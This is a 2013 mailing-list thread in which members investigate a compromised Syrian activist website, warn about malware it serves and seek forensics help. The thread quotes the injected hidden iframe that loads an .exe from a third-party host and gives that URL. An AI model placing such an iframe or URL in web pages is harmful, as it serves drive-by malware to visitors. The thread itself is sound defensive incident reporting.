[liberationtech] Syrian-martyrs.com website probably compromised by virus

Andrew Lewis me at andrewlew.is
Tue Jan 29 14:41:13 PST 2013 

Just a heads up the sites been taken down, malware is here:
https://resources.telecomix.ceops.eu/material/malwares/

Also looking at getting access to the server in question for forensics.

-Andrew


On Jan 30, 2013, at 11:34 AM, SiNA Rabbani <sina at redteam.io> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

This is the malware:

https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/



- --SiNA



SiNA


Rabbani:

holly shit:


<iframe name="I1" width="10" height="10"

src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"



border="0"

frameborder="0">



:/ if you are running windows don't even go there!!!



Andrew Lewis:

I can get to this in 6 hours or so, maybe someone is willing to

jump on this before then?


-Andrew


On Jan 30, 2013, at 11:06 AM, KheOps <kheops at ceops.eu> wrote:


Dear Libtech,


We just saw that the website : http://www.syrian-martyrs.com

is probably compromised. Every page of the website contains an

iFrame which links to a .exe file which is detected as a virus

by antivirus software:

http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe






The fact that the HTML code is present at the bottom of each page makes

me think that the "index.php" page has been changed in a way

that makes that iFrame appear on every page of the website,

after the dynamic content.


It also probably means that the attackers have some kind of

access to the server. My guess would be going to a PHP shell,

but I'm no expert in this.


Any help, clue, investigation, would be very welcome :)


Thank you, KheOps


-- Unsubscribe, change to digest, or change password at:

https://mailman.stanford.edu/mailman/listinfo/liberationtech

-- Unsubscribe, change to digest, or change password at:

https://mailman.stanford.edu/mailman/listinfo/liberationtech






- --
“Be the change you want to see in the world.” Gandhi

OTR: inf0 at jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9
-----BEGIN PGP SIGNATURE-----

iQIcBAEBCgAGBQJRCE5pAAoJEDxieAEiLOmoxJMP/iQNfzxEQcQ81Yp8JtGJmos0
sO+G2HSosH5OD2+PWSXjLuIT7rwijZSgh4XeFz2vIbSicvv1xJZoPzmiUVhKC4GB
9nzUNar86XgtXx2yXCpCjSgQcVwWB2ZRZL6OeZM5DXPUjC/AINXCPQc4rGU1Mcak
B22oBaqiHrWjk5mPQZNcnoJVD2IyL9ZaQBt3WtjLVZo3s59j5vEW/MVqiIrqJiSR
E7m5ehPnfyh4KUKwEe2+/PF9K3e4o8v0DquJhbjxsu0ibfDJg/6cqKaiPYZvOv77
dSQ9YcOOFjHzOYUa/yeTZ2ea92LJPe58IsiIJQxmDWsOFV/upLn1hhVdONN+fTHO
tKzcuCDjqwN1DCWPiyZe7y1EJzl6giplzXNk+XeoXwDau530u5iI65YwQBVtPEsA
kqwHQQxOFsL5kx/JEdO+rKQcX9jAZAkQ9vF6XfNeOGvzwsvLJHbIlFPwxXP/CPjM
kUMdkAjRghEM8kMB9D3BI2MI/uWJN9EVe46ZPQpfmVNBf5Uen9ROyKSp1/h9t9Wy
fbWBDVGJms4rU9rVRsyYhFl3eiHfVDy2/y1yFLEzfCXqEJw7OHAstNJ3O8d+iDKI
WLhlIFej4CyDjzyLy1P9k4YTnv3ZR16hHftIXXT+zj8sKPYXbawiAGWtwbBGws8j
8ijLbNKdHoHtJlcOGMwg
=+vsJ
-----END PGP SIGNATURE-----
--
Unsubscribe, change to digest, or change password at:
https://mailman.stanford.edu/mailman/listinfo/liberationtech
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.stanford.edu/pipermail/liberationtech/attachments/20130130/3eef596d/attachment.html>

More information about the liberationtech mailing list